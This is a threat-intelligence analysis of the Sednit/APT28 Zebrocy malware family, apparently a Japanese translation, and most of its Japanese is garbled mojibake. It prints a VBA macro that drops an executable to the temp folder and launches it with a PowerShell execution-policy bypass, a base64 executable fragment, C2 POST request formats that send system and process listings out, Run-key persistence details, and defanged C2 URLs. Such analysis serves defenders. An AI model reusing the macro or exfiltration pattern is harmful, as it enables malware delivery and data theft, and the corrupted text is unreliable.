Sednitã¯ãAPT28ãFancy BearãSofacyããŸãã¯STRONTIUMãšãåŒã°ãã2004幎以éããããããã以åã«ãç¹å®ã®ãªããžã§ã¯ãããæ©å¯æ
å ±ãçãããšãäž»ãªç®çãšãããµã€ããŒç¯çœªè
ã®ã°ã«ãŒãã§ãã
2015幎ã®çµããããã«ããã®ã°ã«ãŒããæ°ããã³ã³ããŒãã³ã-XagentïŒSednitã®ã¡ã€ã³ããã¯ãã¢ïŒã®ããŒãããŒããŒã§ããZebrocyããããã€ããã®ãèŠãŠããŸããã Kaspersky Labã¯ã2017幎ã«
APTãã¬ã³ãã¬ããŒãã§ãã®ã³ã³ããŒãã³ãã«åããŠèšåããæè¿
ãããã説æ
ããèšäºããªãªãŒã¹ããŸããã
æ°ããã³ã³ããŒãã³ãã¯ã
Delphiããã³
AutoItã§èšè¿°ãããããŠã³ããŒããŒãšããã¯ãã¢ã§æ§æããããã«ãŠã§ã¢ã®ãã¡ããªãŒã§ãã Sednitãšã³ã·ã¹ãã ã§Seduploaderãšåã圹å²ãæãããŸã-æ»æã®æåã®æ®µéã§ãã«ãŠã§ã¢ãšããŠäœ¿çšãããŸãã
ã¢ãŒã«ãã€ãžã£ã³ããã¹ãã¢ããã³ãã«ãã§ãŽããããžã§ãŒãžã¢ããšãžããããžã³ãããšãã€ã©ã³ãã«ã¶ãã¹ã¿ã³ããã«ã®ã¹ã¿ã³ãéåœããã·ã¢ããµãŠãžã¢ã©ãã¢ãã»ã«ãã¢ãã¿ãžãã¹ã¿ã³ããã«ã¯ã¡ãã¹ã¿ã³ããã«ã³ããŠã¯ã©ã€ãããŠã«ã°ã¢ã€ãã¹ã€ã¹ã§ãŒããã·ãŒã®æšçã芳å¯ããŸããã å€äº€å®ã倧䜿通ãå€åçãç®æšã§ãã
Zebrocyãã¡ããªãŒã¯3ã€ã®ã³ã³ããŒãã³ãã§æ§æãããŠããŸãã å±éé ïŒDelphiã®ããŒãããŒããŒãAutoItã®ããŒãããŒããŒãDelphiã®ããã¯ãã¢ã å³1ã¯ããããã®ã³ã³ããŒãã³ãéã®é¢ä¿ã瀺ããŠããŸãã
ãã®æçš¿ã§ã¯ããã®ãã¡ããªãšã以åã®ãµã€ããŒã¹ãã€ããŒã«Seduploaderãšã®çžäºäœçšãããã³Downdelphãšã®çžéç¹ãšé¡äŒŒç¹ã«ã€ããŠ
説æããŸãã
å³1. Sednitãšã³ã·ã¹ãã å³1ã«ãSednitã«ããæ»ææ¹æ³ãšç©æ¥µçã«äœ¿çšããããã«ãŠã§ã¢ã瀺ããŸãã Sednitãšã³ã·ã¹ãã ã§æãäžè¬çã«äœ¿çšãããããšã³ããªãã€ã³ããã¯ãé»åã¡ãŒã«ã®æ·»ä»ãã¡ã€ã«ã§ãã ããã¢ã«ããããã¯ãŒã¯ã¹ã®ç 究è
ã«ããæè¿ã®ããã°æçš¿ã«ãããšãDealersChoiceã¯ãŸã 䜿çšäžã§ãã åµå¯ãã§ãŒãºã®åŸãæ»æè
ãé¢å¿ãæã£ãŠããã¿ãŒã²ãããã·ã³ã«XagentãšXtunnelãå±éãããŸãã
æ»ææ¹æ³
æ»æã®æåã®ã³ã³ããŒãã³ãã¯ãé»åã¡ãŒã«ãä»ããŠZebrocyçµç±ã§é
ä¿¡ãããŸãã 被害è
ã¯æ·»ä»ãã¡ã€ã«-Microsoft OfficeææžãŸãã¯ã¢ãŒã«ã€ããéããŸãã
æªæã®ããããã¥ã¡ã³ã
Sednitã䜿çšããæªæã®ããããã¥ã¡ã³ãã¯ãVisual Basic for ApplicationsïŒVBAïŒããšã¯ã¹ããã€ãããŸãã¯Dynamic Data ExchangeïŒ
DDE ïŒãä»ããŠæ»æã®æåã®æ®µéã®ã³ã³ããŒãã³ããããŠã³ããŒãããŸãã
2017幎ã®çµããã«ãSednitã°ã«ãŒãã¯2ã€ã®ãã£ã³ããŒã³ãéå§ãã2ã€ã®ç°ãªãæªæã®ããããã¥ã¡ã³ãã®é
åžãéå§ããŸããã æåã¯
Syria â New Russia provocations.doc
ã2çªç®ã¯
Note Letter Mary Christmas Card.doc
ã
å³2ïŒZebrocy Malicious Documentäž¡æ¹ã®æªæã®ããããã¥ã¡ã³ãã«ã¯ãïŒ
TEMPïŒ
ã®ã©ã³ãã ãªååã®ãã¡ã€ã«ãäœæããVBAãã¯ããå«ãŸããŠããŸãã Malvariå®è¡å¯èœãã¡ã€ã«ã¯åŸ©å·åãããŠãã®ãã¡ã€ã«ã«æžã蟌ãŸããPowerShellã³ãã³ããŸãã¯
Scriptable Shell Objectsã䜿çšããŠå®è¡ãããŸãã
[...] Sub AutoClose() On Error Resume Next vAdd = "" For I = 1 To 8 vAdd = vAdd + Chr(97 + Rnd(20) * 25) Next vFileName = Environ("temp") & "\" + vAdd & ".e" + "x" & "e" SaveNew vFileName, UserForm1.Label1.Caption Application.Run "XYZ", vFileName, "WScript.Shell" End Sub Public Function XYZ(vF, vW) vStr = "powershell.exe -nop -Exec Bypass -Command Start-Process '" + vF + "';" Call CreateObject(vW).Run(vStr, 0) End Function [...] TVpQAAIAAAAEAA8A//8AALgAAAAAAAAAQAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAEAALoQAA4ftAnNIbgBTM0hkJBUaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZXIgV2lu [...]
Visual Basicé¢æ°ãšãã·ãªã¢ææžããã®ææã®base64æå·åãããæåã®ãã§ãŒãºã®äŸ-New Russia provocations.docã¢ãŒã«ã€ã
äžéšã®ãã£ã³ããŒã³ã§ã¯ããã¯ãã®ä»£ããã«ã¢ãŒã«ã€ãã䜿çšããŠãæ»æã®æåã®ãã§ãŒãºã®ã³ã³ããŒãã³ããé
ä¿¡ããŸããã ãããããã¢ãŒã«ã€ãã¯é»åã¡ãŒã«ã®æ·»ä»ãã¡ã€ã«ãšããŠé
åžãããŸãã
Zebrocyãã¡ããªãŒã®æåã®æ®µéã®å
容ã¯ãã¹ãŠãç ç²è
ã欺ãããã®ææžïŒå³3ïŒãè£
ã£ãã¢ã€ã³ã³ãšååã®ä»ããå®è¡å¯èœãã¡ã€ã«ã§ãã
å³3. Wordææžã¢ã€ã³ã³ä»ãã®ãã¡ã€ã«ã䜿çšããZebrocyææã®æåã®ãã§ãŒãºDelphiã®ããŠã³ããŒããŒ
Delphiã®ããŒãããŒããŒã¯Zebrocyãã¡ããªãŒæ»æã®æåã®ãã§ãŒãºã§ãããSednitã°ã«ãŒãã®äžéšã®ãã£ã³ããŒã³ã§ã¯ãããŒãããŒããŒãªãã§AutoItãã§ãŒãºãçŽæ¥éå§ãããããšãããããŸããã DelphiããŒããŒã®ã»ãšãã©ã®ãã€ããªã¯ãOfficeããã¥ã¡ã³ãã¢ã€ã³ã³ããŸãã¯Windowsã©ã€ãã©ãªãªã©ã®ä»ã®ã¢ã€ã³ã³ã䜿çšã
ãŸã ããããã®ãµã³ãã«ã¯ã
UPXã䜿çšããŠããã±ãŒãžåãããå Žåããã
ãŸã ã ãã®ã¹ãããã®ç®æšã¯éåžžã«åçŽã§ã-被害è
ã®ã³ã³ãã¥ãŒã¿ãŒããæ倧éã®æ
å ±ãååŸããããšã§ãã
ãã«ãŠã§ã¢ãèµ·åãããšãåœã®ãšã©ãŒã¡ãã»ãŒãžãšããŠã³ããŒããããã€ããªãã¡ã€ã«ã®ååã瀺ããŠã£ã³ããŠããããã¢ãã衚瀺ãããŸãã ããšãã°ããã¡ã€ã«åã
srsiymyw.exe
å Žåãåå
srsiymyw.doc
ããããã¢ãããŠã£ã³ããŠã«è¡šç€ºãããŸãïŒå³4ãåç
§ïŒã ãã®ãŠã£ã³ããŠã®ç®çã¯ãã³ã³ãã¥ãŒã¿ãŒäžã§ç°åžžãªããšãèµ·ãã£ãŠãããšãŠãŒã¶ãŒãæããªãããã«ãŠãŒã¶ãŒã®æ³šæããããããšã§ãã
å³4. Delphiã®ããŒãããŒããŒãããã¢ããå®éãããŒãããŒããŒã¯ãïŒ
TEMPïŒ
ã®ãã¡ã€ã«ããã€ããªã§èšè¿°ãããååã§äœæããã®ã«å¿ããããŠããŸãïŒãã ãããã®æç¹ã§ã¯ãã¡ã€ã«ã¯ç©ºã§ãïŒã æ°žç¶æ§ã¯ã
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
ã®Windowsã¬ãžã¹ããªã«ãããŒãã³ãŒããããååã®ãã¡ã€ã«ãžã®ãã¹ãè¿œå ããããšã§ç¢ºä¿ãã
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
ã
æ
å ±ãåéããããã«ããã«ãŠã§ã¢ã¯Windows APIã®CreateProcessé¢æ°ã䜿çšãã
cmd.exe /c SYSTEMINFO & TASKLIST
ã®åŒæ°ãšããŠ
cmd.exe /c SYSTEMINFO & TASKLIST
ã䜿çšããŠæ°ããããã»ã¹ãäœæããŸãã æ
å ±ãåä¿¡ããåŸãçµæã¯HTTP POSTãªã¯ãšã¹ããä»ããŠã³ãã³ããµãŒããŒã«éä¿¡ããããã€ããªãã¡ã€ã«ã«ããŒãã³ãŒããããŸãã ãã®ã¢ã¯ã·ã§ã³ã¯ã次ã®ææ段éã®ãœãããŠã§ã¢ãå¿çãšããŠåä¿¡ããããŸã§ç¹°ãè¿ãããŸãã
POST (\/[a-zA-Z0-9\-\_\^\.]*)\.(php|dat)?fort=<SerialNumber_C> HTTP/1.0 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: xxxx Host: <ip_address> Accept: text/html, */* Accept-Encoding: identity User-Agent: Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1 pol=MM/DD/YYYY%20HH:MM:SS%20(AM|PM)%0D%0A<DriveListing>%0D%0A%0D%0A<Path_to_the_binary>%0D%0A%0D%0A<SYSTEMINFO & TASKLIST output> [...]
Delphiã§HTTP POSTããŒãããŒããŒããªã¯ãšã¹ãããèŠæ±ãéä¿¡ãããåŸãã³ãã³ããµãŒããŒã¯ãæšçã䟵å
¥è
ã«ãã£ãŠèå³æ·±ããšæšå®ãããå Žåã«ããœãããŠã§ã¢ã次ã®æ®µéã«è»¢éããŸãã ã¬ããŒããéä¿¡ããŠãããã¡ã€ã«ãåä¿¡ãããŸã§ã®ãµã€ã¯ã«ã¯æ°æéã§ãã 次ã®ã¹ãããã¯ã以åã«äœæããããã¡ã€ã«ã«æžã蟌ãŸããå®è¡ãããŸãã
AutoItããŠã³ããŒããŒ
AutoItã®ããŒãããŒããŒã¯ã被害è
ã®ã³ã³ãã¥ãŒã¿ãŒã«ææããããã»ã¹ã®ã€ã³ããªãžã§ã³ã¹ãã§ãŒãºã®å¥ã®ãã§ãŒãºã§ãã ããã«ããã®æç¹ããã2ã€ã®ã·ããªãªãå¯èœã«ãªããŸããæåã®ã·ããªãªã§ã¯ãDelphiã®ããŒããŒãæåã®ã¹ããŒãžã§ãAutoItã®ç°¡ç¥åãããããŒããŒã2çªç®ã®ã¹ããŒãžã§ãã å¥ã®ã·ããªãªã§ã¯ãAutoItã®ããŒããŒãæåã®æ®µéã§ãããDelphiããŒããŒã®ãã¹ãŠã®æ©èœãåããŠããŸãã
AutoItã®ããŒããŒãæåã®ã¹ããããšããŠäœ¿çšãããšãå€ãã®ã€ã³ããªãžã§ã³ã¹æ©èœãå®è¡ãããŸãã æ°žç¶åã¡ã«ããºã ããããã¢ãããŠã£ã³ããŠãªã©ãDelphiããŒãããŒããŒãšããã€ãã®é¡äŒŒç¹ããã£ããšããŠããDelphiããŒãããŒããŒã«æ¯ã¹ãŠåµå¯æ®µéã«ã¢ãžã¥ãŒã«æ§ãè¿œå ããŸãã 以äžã¯ãã®æ©èœã®éšåçãªãªã¹ãã§ãã
- ãµã³ãããã¯ã¹ã¢ãŒããšä»®æ³ç°å¢ã®å®çŸ©
- ã€ã³ã¹ããŒã«ããããœãããŠã§ã¢ã®ãªã¹ãã®ååŸïŒHKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Uninstallçµç±ïŒ
- WindowsããŒãžã§ã³ã®æ€åºïŒ32ããããŸãã¯64ãããïŒ
- ããã»ã¹ã®ãªã¹ããååŸãã
- ããŒããã©ã€ãæ
å ±ãååŸãã
- ã¹ã¯ãªãŒã³ã·ã§ãã
- ãã®GitHubãªããžããªã®ã³ãŒãã«è§ŠçºãããWMIãªããžã§ã¯ãã䜿çšããŠã被害è
ã®ã³ã³ãã¥ãŒã¿ãŒã«é¢ããããŸããŸãªæ
å ±ãååŸãã
åã®ã¹ããŒãžã«ãã£ãŠãAutoItãã€ããªã®ååã¯ç°ãªããŸãã ãã«ãŠã§ã¢ãæåã®æ®µéã§å°å
¥ãããå Žåãããã¯ããã¥ã¡ã³ãã®ååã«äŒŒãŠããŸãã ãã以å€ã®å Žåããã€ããªã«ã¯ãè¡š1ã«ç€ºãããã«ãDelphiã®ããŒãããŒããŒã«ç»é²ãããŠããååãå²ãåœãŠãããŸãã

ãã®æ®µéã®ç®æšã¯ãåã®æ®µéãšã»ãŒåãã§ãã ããŸããŸãªããŒãžã§ã³ããããŸããããã¹ãŠã«å°ãªããšã以äžãå®è¡ããã³ãŒãããããŸãã
- ããŒããã©ã€ãCã®ã·ãªã¢ã«çªå·ã®ååŸïŒ
- ãããã¯ãŒã¯é¢æ°ã®ã¢ããªã±ãŒã·ã§ã³
winhttp.dll
ãŸãã¯winhttp.au3
- ã³ãã³ããµãŒããŒã«ãã£ãŠéä¿¡ãããã³ãŒãã®å®è¡
DelphiããŒãããŒããŒãšåæ§ã«ãAutoItã®ããŒãããŒããŒã«ã¯ãããã¢ãããŠã£ã³ããŠããããŸããæ·»ä»ãã¡ã€ã«ã§åä¿¡ããå Žåãã€ãŸãææã®æåã®æ®µéã§ããå Žåã ãããã¢ããã¯ããã€ããªãã¡ã€ã«ã®ã¢ã€ã³ã³ã«ãã£ãŠç°ãªããŸãã ããšãã°ãAdobe Readerããã¥ã¡ã³ãã¢ã€ã³ã³ãä»ããAutoItããŒããŒã¯ã衚瀺ã®ããã«éãããŠããPDFãã¡ã€ã«ãç ŽæããŠããããšã被害è
ã«äŒããŸãã Wordããã¥ã¡ã³ãã¢ã€ã³ã³ãä»ããAutoItãã€ããªãã¡ã€ã«ã«ã¯ããã¹ã¯ãŒããå
¥åããããã®ãŠã£ã³ããŠã衚瀺ãããŸãã ãã¹ã¯ãŒãã¯èæ
®ãããŸãããããã¯ãå®éã®æªæã®ããã³ãŒãã¢ã¯ãã£ããã£ãã被害è
ããããæ¹æ³ã«éããªããšèããŠããŸãã
å³5. AutoItã®ããŒãããŒããŒãããã¢ããDelphiããã¯ãã¢
Delphiããã¯ãã¢ã¯ãZebrocyã³ã³ããŒãã³ããã§ãŒã³ã®æçµæ®µéã§ãã 以åãZebrocyãSednitã®ãã©ãã°ã·ããããã¯ãã¢ïŒXagentïŒãããŠã³ããŒãããã®ãèŠãŠããŸããã 以åã®ã³ã³ããŒãã³ããšã¯ç°ãªãããã®ã³ã³ããŒãã³ãã«ã¯å
éšããŒãžã§ã³çªå·ããããç¹å®ã®ãã£ã³ããŒã³ã«é¢é£ããŠããªãããã§ãã è¡š2ã«ç€ºãããã«ããã®æ°ã¯æéãšãšãã«å€åããŸãã

ããã¯ãã¢ã®ããã€ãã®ããŒãžã§ã³ãèŠéããŠããå¯èœæ§ãããããšã«æ³šæããŠãã ããã ããã«ãããŒãžã§ã³ã¯éè€ããŠããŸã-å€ãããŒãžã§ã³ã¯æ°ããããŒãžã§ã³ãšåæã«äœ¿çšãããŸãã
次ã«ããã®ãã«ãŠã§ã¢ã®é²åã®éçšã§èŠãããã€ãã®éãã«ã€ããŠèª¬æããŸãã æ§æãããã¯ãããã¯ãã¢ã«çµã¿èŸŒãŸããŠããŸãã æ§æå€ã¯ãµã³ãã«ããšã«ç°ãªããŸãããæ§æå¯èœãªé
ç®ã®ãªã¹ãã¯å€æŽãããŠããŸããã ãã ããMalvariæ§æããŒã¿ãä¿åããæ¹æ³ã¯ãæéã®çµéãšãšãã«é²åããŠããŸãã
ããã¯ãã¢ã®æåã®ããŒãžã§ã³ã«ã¯ãå³6ã«ç€ºãããã«ãæ§æããŒã¿ããã¬ãŒã³ããã¹ãã§å«ãŸããŠããŸããã
å³6.ãã¬ãŒã³ããã¹ãã®Delphiããã¯ãã¢æ§æããŒã¿ãã®åŸãåŸã®ããŒãžã§ã³ã§ã¯ãäœæè
ã¯æ§æã16é²æ°æååãšããŠãšã³ã³ãŒãããŸããïŒå³7ãåç
§ïŒã
å³7.æå·åãããDelphiããã¯ãã¢æ§ææ
å ±æè¿ã®ããŒãžã§ã³ã§ã¯ãæ§ææ
å ±ã¯AESã¢ã«ãŽãªãºã ã䜿çšããŠãªãœãŒã¹ã§æå·åãããŸãã å€ãããŒãžã§ã³ã¯
.textã»ã¯ã·ã§ã³ã«ä¿åãã
ãŸã ã
æ§æããŒã¿ã«ã¯ä»¥äžãå«ãŸããŸãã
- ã³ãã³ããµãŒããŒãšã®éä¿¡çšã®AESããŒ
- ãã¿ãŒã³ããšã«ç°ãªãURL
- ãã«ãŠã§ã¢ããŒãžã§ã³
- ããã¯ãã¢ã®æ°žç¶æ§ãæäŸããWindowsã¬ãžã¹ããªããŒ/å€
- äžæãã¡ã€ã«ãä¿åãããŠãããã¹ïŒ ïŒ
APPDATAïŒ
ïŒ
- äžæãã¡ã€ã«ãä¿åããããã«äœæãããé ããã£ã¬ã¯ããªã®ååïŒãã£ã¬ã¯ããªãã¡ã€ã«ã®ååãšç°å¢å€æ°ã¯é£çµãããŸãïŒ ïŒ
APPDATAïŒ
ïŒ
èšå®åŸããã«ãŠã§ã¢ã¯
SetTimer Windows APIé¢æ°ã䜿çšããŠã³ãŒã«ããã¯é¢æ°ãå®è¡ããŸãã ã³ãŒã«ããã¯ã«ãããMalvariãªãã¬ãŒã¿ãŒã¯å€ãã®ããŒã«ãšããã¯ãã¢ã³ãã³ããå©çšã§ããŸãã
- 被害è
ã®ãã¹ã¯ãããã®ã¹ã¯ãªãŒã³ã·ã§ãããæ®ã
- ããŒã¹ãããŒã¯åå
- ãã©ã€ã/ãããã¯ãŒã¯ãªãœãŒã¹ã®ãªã¹ããååŸãã
- Windowsã¬ãžã¹ããªãžã®æžã蟌ã¿/èªã¿åã
- ãã¡ã€ã«ã·ã¹ãã ãªããžã§ã¯ãã®ã³ããŒ/移å/åé€
- ãã¡ã€ã«ã®å®è¡ããŸãã¯èšç»ãããã¿ã¹ã¯ã®èšå®
ããã¯ãã¢ãå®è¡ã§ããã³ãã³ãã®æ°ã¯çŽ30ãããããŒãžã§ã³ã«ãã£ãŠç°ãªããŸãã
ã³ãã³ããµãŒããŒãšéä¿¡ããããã«ãããã¯ãã¢ã¯ãããã®æ©èœã«é¢ããã¬ããŒããäžæãã¡ã€ã«ã«ä¿åããŸãã 次ã«ãäžæãã¡ã€ã«ã®å
容ãèªã¿åãã転éããŸãã äžæãã¡ã€ã«ã¯ãã€ã³ã¹ããŒã«ããã»ã¹äžã«äœæãããé ããã£ã¬ã¯ããªã®1ã€ã«ä¿åãããŸãã
POST (\/[a-zA-Z0-9\-\_\^\.]*)\.(php|dat). HTTP/1.0 Connection: keep-alive Content-Type: multipart/form-data; boundary=--------<mmddyyhhnnsszzz> Content-Length: <N> Host: <ip_address> Accept: text/html, */* Accept-Encoding: identity User-Agent: Mozilla/3.0 (compatible; Indy Library) ----------<mmddyyhhnnsszzz> Content-Disposition: form-data; name="userfile"; filename="%APPDATA%\Microsoft\<directories>\<tempfilename>.tmp" Content-Type: <tempfilename_hex_encoded>.tmp <tempfilename content> ----------<mmddyyhhnnsszzz>--
Delphiããã¯ãã¢POSTãªã¯ãšã¹ãtempfilename
ã®å
容ã¯ãå®è¡å¯èœãªã³ãã³ãã®åºåã§ãã ã³ã³ãã³ãã¯ãAES-256-ECBã¢ã«ãŽãªãºã ã䜿çšããŠãæ§æããŒã¿ããã®æåã®AESããŒã䜿çšããŠæå·åãããçµæã¯16é²ã·ã¹ãã ã§æžã蟌ãŸããŸãã ã³ãã³ããµãŒããŒã«è»¢éãããã³ã³ãã³ãã¯ã³ãã³ãã«ãã£ãŠç°ãªããŸãããåžžã«ããŒããã£ã¹ã¯ã®ã·ãªã¢ã«çªå·ãšã³ã³ãã¥ãŒã¿ãŒåã®æåã®4ãã€ããå«ãŸããŠããŸãã
ããšãã°ã
HELLO
ã¯ãã³ãã³ããµãŒããŒãšã®æ¥ç¶ã確ç«ããããã«ããã¯ãã¢ããéä¿¡ãããæåã®ãã±ããã«å¯Ÿå¿ããŸãã 以äžã«ç€ºãããã«ãã¿ã¹ã¯ã®èµ·åæ¥ãDelphiããã¯ãã¢ã®å
éšããŒãžã§ã³çªå·ãHDDã®ã·ãªã¢ã«çªå·ãã³ã³ãã¥ãŒã¿ãŒåïŒæåã®4ãã€ãïŒãã³ãã³ããããã³ãã®ããã¯ãã¢ã䜿çšãããæ¥ä»ãå«ãŸããŠããŸãã
Start: 1/4/2018 1:37:00 PM â [<vx.x>]:42424242ESET-HELLO-[2018-04-04 01-37-00]-315.TXT.
æ§æããŒã¿ã®2çªç®ã®AESããŒã¯ãã³ãã³ããµãŒããŒã®å¿çã解èªããããã«äœ¿çšãããŸãã
Seduploaderãšåæ§ã«ããã®ããã¯ãã¢ã¯ãã€ã³ããªãžã§ã³ã¹ãã§ãŒãºã®åŸã«ãªãã¬ãŒã¿ãŒã«èå³ãæã£ãŠãã被害è
ã®ãã·ã³ã«Xagentãå±éããããã«äœ¿çšãããŸãã
ãããã«
Delphiã§ã³ã³ããŒãã³ããèšè¿°ããããšã¯Sednitã°ã«ãŒãã«ãšã£ãŠæ°ããããšã§ã¯ãªãã圌ãã¯ãã§ã«ãã®èšèªã
Downdelphã«äœ¿çšããŠããŸãã ãã ããæåŸã®ã³ã³ããŒãã³ããDowndelphãšã¯é¢ä¿ããªãå Žåã§ããèšåãã䟡å€ã®ããèå³æ·±ãç¹ããããŸãã
- å±éæ¹æ³ã¯åãã§ãäž¡æ¹ã®ã³ã³ããŒãã³ããé»åã¡ãŒã«ã®æ·»ä»ãã¡ã€ã«ãšããŠå®è£
ãããŸã
- 2015幎9æã«ããŠã³ãã«ããæåŸã«èŠããšãããã®èªç¶ã®çæ¯å°ããã®æåã®Zebrocyæšæ¬ã¯2015幎11æã®æ¥ä»ã§ã
- äž¡æ¹ãšãDelphiã§æžãããŠããŸã
Sednitã°ã«ãŒãã1ã€ã®ã³ã³ããŒãã³ããå±éããæ°ããã³ã³ããŒãã³ãã®éçºãéå§ãããšæ³å®ã§ããŸãã ã°ã«ãŒãå
ã§
å€ãããªãå¯äžã®ãã®ã¯ãç¹æ§ãšã©ãŒã§ãã
- ã¹ã±ãžã¥ãŒã«ãããã¿ã¹ã¯åïŒ
Windiws
- AutoItã®ããŒããŒã§ã·ã¹ãã æ
å ±ãåãåãé¢æ°ã®ååïŒ
_SOFWARE()
Note Letter Mary Christmas Card.doc
ã§Merry
代ããã«Merry
Delphiããã¯ãã¢ãAES-256ããŒãšããŠäœ¿çšãããã€ãé
åã«ã¯ã32ãã€ãã§ã¯ãªã38ãã€ããå«ãŸããŠããŸããããã¯ãäžæ³šæã«ãããšã©ãŒã®ããã«èŠããŸãã
éå»2幎éã§ãSednitã°ã«ãŒãã«ããZebrocyã®ç©æ¥µçãªäœ¿çšãèŠãŠããŸããã 2017幎以éå®æçã«è¡šç€ºãããæ°ããããŒãžã§ã³ã®åæã¯ãèè
ãZebrocyãç©æ¥µçã«ãµããŒãããã³æ¹åããŠããããšãæ確ã«ç€ºããŠããŸãã ããã¯ãSednitã®æŠåšåº«ã«åžžåãããŠãããã«æ©èœã®ããŒã«ã®1ã€ã§ããããããã£ãŠçŽ°å¿ã®æ³šæãå¿
èŠã§ãããšæ³å®ã§ããŸãã
䟵害ã€ã³ãžã±ãŒã¿ïŒIoCïŒ
æªæã®ããããã¥ã¡ã³ã
Delphiã®ããŠã³ããŒããŒ
AutoItããŠã³ããŒããŒ
Delphiããã¯ãã¢
URLã¢ãã¬ã¹http://142[.]0.68.2/test-update-16-8852418/temp727612430/checkUpdate89732468.php
http://142[.]0.68.2/test-update-17-8752417/temp827612480/checkUpdate79832467.php
http://185[.]25.50.93/syshelp/kd8812u/protocol.php
http://185[.]25.50.93/tech99-04/litelib1/setwsdv4.php
http://185[.]25.50.93/techicalBS391-two/supptech18i/suppid.php
http://185[.]25.51.114/get-help-software/get-app-c/error-code-lookup.php
http://185[.]25.51.164/srv_upd_dest_two/destBB/en.php
http://185[.]25.51.198/get-data/searchId/get.php
http://185[.]25.51.198/stream-upd-service-two/definition/event.php
http://185[.]77.129.152/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://188[.]241.68.121/update/dB-Release/NewBaseCheck.php
http://194[.]187.249.126/database-update-centre/check-system-version/id=18862.php
http://194[.]187.249.126/security-services-DMHA-group/info-update-version/id77820082.php
http://213[.]103.67.193/ghflYvz/vmwWIdx/realui.php
http://213[.]252.244.219/client-update-info/version-id/version333.php
http://213[.]252.244.219/cumulative-security-update/Summary/details.php
http://213[.]252.245.132/search-release/Search-Version/crmclients.php
http://213[.]252.245.132/setting-the-os-release/Support-OS-release/ApiMap.php
http://220[.]158.216.127/search-sys-update-release/base-sync/db7749sc.php
http://222[.]15.23.121/gft_piyes/ndhfkuryhs09/fdfd_iunb_hhert_ps.php
http://46[.]102.152.127/messageID/get-data/SecurityID.php
http://46[.]183.223.227/services-check-update/security-certificate-11-554/CheckNow864.php
http://80[.]255.6.5/daily-update-certifaicates52735462534234/update-15.dat
http://80[.]255.6.5/LoG-statistic8397420934809/date-update9048353094c/StaticIpUpdateLog23741033.php
http://86[.]105.18.106/apps.update/DetailsID/clientPID-118253.php
http://86[.]105.18.106/data-extract/timermodule/update-client.php
http://86[.]105.18.106/debug-info/pluginId/CLISD1934.php
http://86[.]105.18.106/ram-data/managerId/REM1234.php
http://86[.]105.18.106/versionID/Plugin0899/debug-release01119/debug-19.app
http://86[.]105.18.111/UpdateCertificate33-33725cnm^BB/CheckerNow-saMbA-99-36^11/CheckerSerface^8830-11.php
http://86[.]106.131.177/srvSettings/conf4421i/support.php
http://86[.]106.131.177/SupportA91i/syshelpA774i/viewsupp.php
http://89[.]249.65.166/clientid-and-uniqued-r2/the-differenceU/Events76.php
http://89[.]249.65.166/int-release/check-user/userid.php
http://89[.]249.65.234/guard-service/Servers-ip4/upd-release/mdb4
http://89[.]40.181.126/verification-online/service.911-19/check-verification-88291.php
http://89[.]45.67.153/grenadLibS44-two/fIndToClose12t3/sol41.php
http://89[.]45.67.153/supportfsys/t863321i/func112SerErr.php
http://93[.]113.131.117/KB7735-9927/security-serv/opt.php
http://93[.]113.131.155/Verifica-El-Lanzamiento/Ayuda-Del-Sistema/obtenerId.php
http://93[.]115.38.132/wWpYdSMRulkdp/arpz/MsKZrpUfe.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/EspTkzmH.php
http://rammatica[.]com/QqrAzMjp/CmKjzk/OspRkzmG.php